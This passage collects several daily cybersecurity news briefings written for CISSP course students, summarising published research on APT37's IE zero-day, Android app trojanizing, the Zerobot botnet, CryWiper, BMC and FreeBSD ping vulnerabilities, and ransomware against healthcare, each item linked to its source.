Once opened, the document downloads a remote RTF template containing HTML, which causes Office to call the IE rendering engine DLL. This technique is well known, but in this case, it exploits a 0day vulnerability (CVE-2022-41128)  in the IE JScript engine. The exploit JavaScript first contacts a C2 server, then launches the exploit shellcode, which covers its tracks by erasing the IE cache and history before downloading the next stage. Google's analysts did not have access to that code, but the same attackers have previous used a variety of implants such as ROKRAT, BLUELIGHT and DOLPHIN.

The infection could easily be blocked by an alert user, since the downloaded document carries the Mark of the Web and requires the user to disable protected view and allow editing. The attack is attrobuted to the North Korean group, APT37, also known as ScarCruft, Reaper and InkySquid.

LeCigne, Clement and Benoit Sevens, Internet Explorer 0-day exploited by North Korean actor APT37, blog post, 7 December 2022. Available online at https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/.

Darknet Service Trojanizes Legitimate Android Apps

A banking trojan campaign uncovered by fraud intelligence firm ThreatFabric has led investigators to a third-party dark web service which can bind malicious payloads to legimate Android applications, thereby tricking victims into installing them.

The initial campaign employed several types of desktop malware such as the Erbium stealer, Auora stealer and Laplas clipper, as well as the Ermac Android banking trojan. The latter was distributed by a one-page website offering applications for wi-fi authorization; several updates were downloaded, with payloads targeting different banking applications. The same site also offered downloads for Windows, which also carried banking trojans.

The researchers tracked these back to a binding service, initially offered by a threat actor in March 2022, called Zombinder, which is now used by several different actors. This is being used to distribute a variety of mobile malware, mainly banking trojans such as Ermac and Xenomorph.

Uncredited, Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers, blog post, 8 December 2022. Available online at https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html.

Medibank Goes Offline To Remediate Its Networks

Australian insurer Medibank will take its systems offline - and close its retail storefronts - this weekend while it performs remediation work on the networks and systems which were affected by its recent highly-publicized data breach. All systems for both Medibank and its ahm general insurance subsidiary will be offline from 8:30 pm AEDT tonight (9 December) and are expected to be back online by Sunday 11 December at the latest.

The Medibank app, as well as online terminals for directly processing claims at service provider practices, will also be offline.  The lesson: never underestimate remediation costs following a breach.

Uncredited, Planned outage to Medibank systems, notification, 7 December 2022. Available online at https://www.medibank.com.au/health-insurance/info/cyber-security/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

New Botnet Targets Multiple Architectures

FortiGuard Labs researchers have observed, and now analysed, a new botnet which is written in the Go programming language and is targeting IoT devices running on a variety of processor architectures - i386, amd64, arm, arm64, mips, mips64, mipsle, ppc64, ppc64le, riscv64 and s390x (although it is hard to imagine many IoT devices running the S/390 mainframe instruction set).

The botnet, called Zerobot, initially had only basic capabilities but in late November it added more functionality. Disassembly of the code revealed that after initial infection it tests Internet connectivity and then copies itself onto the target device, in an OS-dependent location, and then sets up a signal handler to intercept attempts to kill it. From there, it connects to its C2 server using the WebSocket protocol and sends some platform enumeration data, after which it waits for a command.

Zerobot can employ any of 21 different exploits which target a range of IoT devices but also includes Spring4Shell, and exploits for phpAdmin and F5 Big-IP. It is rapidly evolving; within a very short time it was updated with string obfuscation, a copy file module and a propagation exploit module which gives it the ability to infect more devices. The FortiGuard Research post includes IOC's, but its rapid evolution means that proactive patching against its exploits will be the best defence.

Lin, Cara, Zerobot - New Go-Based Botnet Campaign Targets Multiple Vulnerabilities, blog post, 6 December 2022. Available online at https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities.

Sophisticated Attack on Amnesty International Canada

Amnesty International Canada (English-speaking Section) has revealed that it was the target of a sophisticated cyberattack which forensic experts from Secureworks believe was sponsored by the Chinese state. This conclusion is based on "the nature of the targeted information as well as the observed tools and behaviors, which are consistent with those associated with Chinese cyberespionage threat groups".

The breach was first detected on 5 October 2022, when suspicious behaviour was observed on Amnesty's IT infrastructure. Immediate action was taken, with Secureworks being retained to protect the organization's systems and investigate the attack. The investigation has uncovered no evidence that any donor or membership data was exfiltrated.

Amnesty is speaking publicly to warn other human rights organizations about the rising threat of cyber breaches, and to strongly condemn state and non-state actors who are intent on interfering with the work of human rights and other civil society organizations.

Ruf, Cory, Amnesty International Canada target of sophisticated cyber-attack linked to China, news release, 5 December 2022. Available online at https://www.amnesty.ca/news/news-releases/cyber-breach-statement/.

Likely Chinese APT Targets Middle East Telco

Researchers at Bitdefender have found a new cyber-espionage campaign which targeted a telecommunications firm in the Middle East. Investigation of sample binaries suggests the campaign is attributed to a Chinese threat actor called BackdoorDiplomacy.

The initial infection mechanism was an August 2021 ProxyShell exploitation of a vulnerable Exchange server. From there, the group deployed the NPS proxy tool and the IRAFAU backdoor into the organization. In February 2022, the attackers deployed the Quarian backdoor along with several other scanners and proxy/tunneling tools, with the use of keyloggers and exfiltration tools suggesting the campaign objective is cyber-espionage.

BackdoorDiplomacy has been operating since at least 2017, targeting institutions in the Middle East, Africa and the US. The researchers have produced a comprehensive 33-page whitepaper which details the techniques used for initial access, execution, reconnaisance, lateral movement, persistence, privilege escalation, defence evasion, collection and infiltration, as well as cataloguing the various tools used.

Schipor, Adriand and Victor Vrabie, BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign, blog post, 7 December 2022. Available online at https://www.bitdefender.com/blog/labs/backdoor-diplomacy-wields-new-tools-in-fresh-middle-east-campaign.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Russian Mayors' Offices, Courts, Hit by Wiper

Who can forget 2017's NotPetya attack - a wiper which spread around the world and across industries, yet likely started as an attack on the Ukrainian Government's tax revenues, by Russian threat actors? Now Russia is on the receiving end of a wiper attack, although it seems unlikely to have quite the same impact.

According to Kaspersky researchers, CryWiper is written in C++ and, unusually, compiled using the MinGW-w64 toolkit and gcc compiler, rather than the more common Microsoft tools - suggesting that the author was using a non-Microsoft OS for development. After creating a scheduled task in order to remain active, the malware contacts its C2 server, passing the name of the infected computer and, in response, the C2 server replies 'run' or 'do not run'. If instructed not to run, the malware delays execution with the intention of checking again in 4 days.

But if run, CryWiper stops any running MqSQL or SQL Server databases, deletes shadow copies of files and blocks RDP connections, presumably to slow incident responders. It then sets about overwriting user files with random data, which it generates using the Mersenne Vortex pseudo-random number generator (a characteristic it shares with the Isaac Wiper malware). It also leaves a ransom demand in a README.txt file - but of course, there is no point in paying the ransom.

CryWiper has been attacking systems in the Russian Federation, particularly courts and mayors' offices.

Sinitsyn, Fedor and Janis Zinchenko, Новый троянец CryWiper прикидывается шифровальщиком, Kaspersky SecureList blog, 1 December 2022. Available online at https://securelist.ru/novyj-troyanec-crywiper/106114/. Google translation at https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp.

Ransomware is Accidental Wiper

In related news, Fortinet Labs reports on a ransomware toolkit called Cryptonite which has been used to produce customised ransomware for targeted campaigns. The toolkit provides a simple sample which lets the operator set an exclusion list server URL, email address and bitcoin wallet, but which lacks the more advanced features common in today's ransomware, such as shadow copy file deletion, file unlocking (e.g. stopping databases, as in the CryWiper example above), and antiforensics and evasion techniques.

However, Fortinet stumbled across a sample in the wild which went through all the steps of encryption, even displaying a progress bar as it pretended to be a software update. However, it never displayed the final window which would allow the victim to enter a decryption key. Suspecting the threat actor behind this sample had deliberately turned it into a wiper, the researchers set about decompiling the sample into its original Python code.

After being led astray by an interesting failure in the decompilation process, they turned to dynamic analysis, eventually tunning the sample in a cmd.exe window, which produced an error message that revealed all: the ransomware failed to load the tkinter library, which would be used to produce the pop-up window for the decryption key (tkinter is commonly used to implement GUI's for a number of scripting languages). This leaves no way for the victim to recover, as the decryption key is lost from memory when the program crashes, and is never sent to the operator.

The saving grace is that Cryptonite is very basic and should be easily detected by anti-malware programs. Also, the toolkit has now been removed from GitHub.

Revay, Gergely, The Story of a Ransomware Turning into an Accidental Wiper, blog post, 5 November 2022. Available online at https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper.

Servers at Risk of RCE Exploits Via Baseboard Management Controllers

Last week we wrote of vulnerabilities in baseboard management controller chips which had been repurposed into devices on the Internet of Things. It was, perhaps, inevitable that the same vulnerabilities would show up in the rackmount servers which are the intended use case for BMC chips - and they have, according to a report from Eclypsium.

The vulnerabilities are actually in the AMI MegaRAC software which runs on the BMC circuitry of servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo as well as motherboard manufacturers such as ASRock, ASUS and Gigabyte. Eclypsium refers to the three vulnerabilities as BMC&C:

• CVE-2022-40259 – Arbitrary Code Execution via Redfish API (CVSS v3.1 score: 9.9, Critical)
  
• CVE-2022-40242 – Default credentials for UID = 0 shell via SSH (CVSS v3.1 score 8.3, High)
  
• CVE-2022-2827 – User enumeration via API (CVSS v3.1 score 7.5, High)
  

Redfish is the successor to the older IPMI, and provides an API for server management in data centers. It is supported by almost all major vendors as well as the OpenBMC firmware project. The first two CVE's both lead directly to a root shell, with no further escalation necessary.

Suggested mitigations include ensuring that remote management interfaces are on dedicated management networks and not exposed externally, and disabling built-in administrative accounts.

Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Remember Ping of Death? You Are Not Alone

Many years ago, systems which used code from the BSD TCP/IP stack - which was most OS's of the era, including Windows - were plagued by a buffer overflow in the IP fragment reassembly code which would instantly crash the targeted system. This exploit was nicknamed the 'Ping of Death'. Now FreeBSD users are having a sense of deja vu, as they come to grips with a buffer overflow in the ping utility.

In order to process the ICMP echo reply (or other error) responses it receives, ping has to reconstruct the received IP header, its ICMP payload and - if there is one - the IP and ICMP headers of the error-generating datagram, which is the payload of ICMP itself. To do this, it calls a pr_pack() function which - and here's the vulnerability - fails to allow for any IP header options in either of the two IP headers. If there are options, the result is that the destination buffer is overflowed by up to 40 bytes - and those bytes could be carrying shellcode. Can you spell RCE? I knew you could!

But it gets better: because ping uses ICMP, it has to make use of a raw socket to work, and this requires root privileges - so it runs as a SetUID executable; in other words, as root. The saving grace is that the ping process runs in a capability mode sandbox on the affected versions of FreeBSD, and is thus very constrained in how it can interact with the rest of the system. But it's surprising what an ingenious attacker can achieve from such a tenuous toehold on a targeted system.

There is no workaround, and all supported versions of FreeBSD are affected. The fix is to upgrade to a supported version dated after 2022-11-29 23:00 UTC, approximately - see the security advisory for full details.

Uncredited, Stack overflow in ping(8), security advisory, 29 November 2022. Available online at https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc.

Chinese Hackers Stole Tens of Millions of Dollars of US COVID Relief Funding

According to the US Secret Service, hackers associated with the Chinese government stole at least $US20 million in US COVID relief benefits, including Small Business Administration loans and unemployment insurance funds. The theft was performed by APT41, aka Winnti, a threat actor that splits its efforts between financially motivated cybercrime on its own behalf and cyber-espionage for the Chinese government.

Several members of APT41 were indicted by the Department of Justice for espionage operations, with Deputy Attorney General Jeffrey Rosen commenting at the time, "Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China".

Bing, Christopher, Chinese hackers stole millions worth of U.S. COVID relief money, Secret Service says, Reuters, 6 December 2022. Available online at https://www.reuters.com/technology/chinese-hackers-stole-millions-worth-us-covid-relief-money-secret-service-says-2022-12-05/.

Healthcare Ransomware Attacks Escalating

Ransomware attacks on hospitals, health insurers and other parts of the healthcare sector are steadily increasing and it seems likely that this will become one of the major security trends of 2023.

Last week, it was the turn of New Zealand health insurance company Accuro, which announced that it had lost access to its systems - which seems to be code for ransomware - and while it had no evidence of personal health information being exfiltrated, it could not rule it out. The previous month, patient data stolen from NZ GP network Pinnacle Health was posted on the web. And, of course, I need not mention Medibank.

Most recently, a hospital complex in Versailles, in the suburbs of Paris, had to cancel operations and transfer some patients because of a cyberattack, according to the French health ministry. The Hospital Centre of Versailles, which consists of Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, had to shut down its computer systems, internet access and phone systems due to what appears to be a ransomware attack.

Extra staff had to be called in to the intensive care unit because although the equipment there was still working, it was not connected to the network, and doctors had to rely on people watching the screens. Six patients in total had to be transferred - three from intensive care and three from the neonatal unit, said the Minister, Francois Braun, duting a visit to the hospital.

Many other French hospitals have been attacked - the same hospital had successfully defended itself against previous attacks but back in August the Corbeil-Essonnes hospital, also on the outskirts of Paris, was disrupted for several weeks due to a ransomware attack. Although in that case, $US10 million ransom was demanded, it would not be paid, since the French government has legislated to make ransom payments illegal.

AFP, French hospital suspends operations after cyber attacks, France 24, 5 December 2022. Available online at https://www.france24.com/en/france/20221205-french-hospital-suspends-operations-after-cyber-attacks.

Palo Alto Introduces Medical IoT Security

In the cases above, the key equipment was not affected - only the networks and computers. But network-connected medical equipment such as infusion pumps, imaging devices (X-ray, MRI and CT scanners) and even more basic ECG monitors are increasingly based on embedded microcontrollers or computers - in many cases, even running COTS operating systems.

In fact, according to Palo Alto Networks' Unit 42 Threat Research, 75% of infusion pumps they studied had at least one vulnerability or threw up a security alert, while 51% of X-ray machines had a high-severity vulnerability (CVE-2019-11687). 44% of CT scanners and 31% of MRI machines had high-severity exposures and - not really a surprise - 20% of common imaging devices were running an unsupported version of Windows.

Seeing an obvious market opportunity - not to mention a need - Palo Alto has introduced a new Medical IoT Security product which will assess all devices and guide network segmentation to enforce the privilege of least privilege, using machine learning. There's lots of other functionality, including ensuring data residency requirements in various countries are met, regulatory compliance, device vulnerability management and automated response to anomalies.

It will be interesting to see how this pans out. According to medical professionals I have spoken to, they often need privileges in excess of their normal roles in order to respond to patient emergencies, and so attempts to tightly lock down medical information systems can be terribly counter-productive. But, as the previous story shows, the opposite approach doesn't work either. Find the 'sweet spot' is going to be a difficult process.

Xu Zou, The Medical IoT Security To Depend on When Lives Depend on You, blog post, 5 December 2022. Available online at https://www.paloaltonetworks.com/blog/2022/12/medical-iot-security-to-depend-on/.

Koppel, R., Smith, S., Blythe, J., & Kothari, V., Workarounds to Computer Access in Healthcare Organizations: You Want My Password or a Dead Patient?, in Driving Quality in Informatics: Fulfulling the Promise, 2015, vol. 208, pp. 215–220.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.